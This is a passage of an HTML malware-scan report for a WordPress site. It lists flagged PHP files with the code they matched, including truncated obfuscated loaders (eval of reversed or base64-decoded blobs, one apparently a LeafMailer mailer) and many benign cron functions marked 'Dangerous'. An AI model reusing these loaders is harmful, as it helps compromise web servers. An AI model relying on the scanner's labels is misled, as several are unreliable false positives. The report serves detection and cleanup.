<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$event</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 830</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">false The Unix timestamp </span><span style="color: #007700">(</span><span style="color: #0000BB">UTC</span><span style="color: #007700">) </span><span style="color: #0000BB">of the next time the event will occur</span><span style="color: #007700">. </span><span style="color: #0000BB">False </span><span style="color: #007700">if </span><span style="color: #0000BB">the event doesn</span><span style="color: #DD0000">'t exist.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 832</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_next_scheduled</span><span style="color: #007700">( </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">= array() ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 859</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">( </span><span style="color: #DD0000">'wp_next_scheduled'</span><span style="color: #007700">, </span><span style="color: #0000BB">$next_event</span><span style="color: #007700">-></span><span style="color: #0000BB">timestamp</span><span style="color: #007700">, </span><span style="color: #0000BB">$next_event</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$args </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 866</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">values added</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 869</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool True </span><span style="color: #007700">if </span><span style="color: #0000BB">spawned</span><span style="color: #007700">, </span><span style="color: #0000BB">false </span><span style="color: #007700">if </span><span style="color: #0000BB">no events spawned</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 871</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">spawn_cron</span><span style="color: #007700">( </span><span style="color: #0000BB">$gmt_time </span><span style="color: #007700">= </span><span style="color: #0000BB">0 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 926</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 971</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return ! </span><span style="color: #0000BB">is_wp_error</span><span style="color: #007700">( </span><span style="color: #0000BB">$result </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 977</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">calls</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 980</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">may </span><span style="color: #007700">return </span><span style="color: #0000BB">Boolean FALSE</span><span style="color: #007700">, </span><span style="color: #0000BB">but may also </span><span style="color: #007700">return </span><span style="color: #0000BB">a non</span><span style="color: #007700">-</span><span style="color: #0000BB">Boolean</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 987</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functionality moved to _wp_cron</span><span style="color: #007700">() </span><span style="color: #0000BB">to which this becomes a wrapper</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 989</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">|</span><span style="color: #0000BB">int</span><span style="color: #007700">|</span><span style="color: #0000BB">void On success an integer indicating number of events spawned </span><span style="color: #007700">(</span><span style="color: #0000BB">0 indicates no</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 991</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">registered _wp_cron</span><span style="color: #007700">() </span><span style="color: #0000BB">to run on the action</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 993</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wp_cron</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_wp_cron</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_83").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/GTjX4sVmNqR.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 51.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:17:55</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_84" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkpXTUweDBbXfimy1tTTEF...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #DD0000">'; $MAIqK = '</span><span style="color: #0000BB">strrev</span><span style="color: #DD0000">'; ini_set('</span><span style="color: #0000BB">display_errors</span><span style="color: #DD0000">', 0); ini_set('</span><span style="color: #0000BB">error_log</span><span style="color: #DD0000">', NULL); error_reporting(0); ini_set('</span><span style="color: #0000BB">log_errors</span><span style="color: #DD0000">', 0); eval($MAIqK($eyxBz('</span><span style="color: #0000BB">OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd</span><span style="color: #007700">+</span><span style="color: #0000BB">KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2Z</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$MAIqK</span><span style="color: #007700">(</span><span style="color: #0000BB">$eyxBz</span><span style="color: #007700">(</span><span style="color: #DD0000">'OykpKSkpKSkpKSkpKSkpKSkpKSldODAwMDB4MFtd+KbLW1NMQUJPTEckKDVNaUUyRVZSbkFBZ1VwT1RfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlfTspKSkpT0REc1Bnb18kKGxaWVZfKGs4ZmRHSktUV18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2s4ZmRHSktUV18kbGFib2xnO0pyWU42XyRsYWJvbGd7KU9ERHNQZ29fJCg1TWlFMkVWUm5BQWdVcE9UXyBub2l0Y251ZjtdNzAwMHgwW134pstbU0xBQk9MRyQ9azhmZEdKS1RXXyQ7XTYwMHgwW134pstbU0xBQk9MRyQ9SnJZTjZfJH07OUVZYm1fJCBucnV0ZXI7KSkp...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function strrev eval_strrev <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">LavE</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VJag</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_84").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/lxzve.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:16:40</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:16:40</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_85" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_85").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/qxsgj.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 23:46:14</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 23:46:14</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_86" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
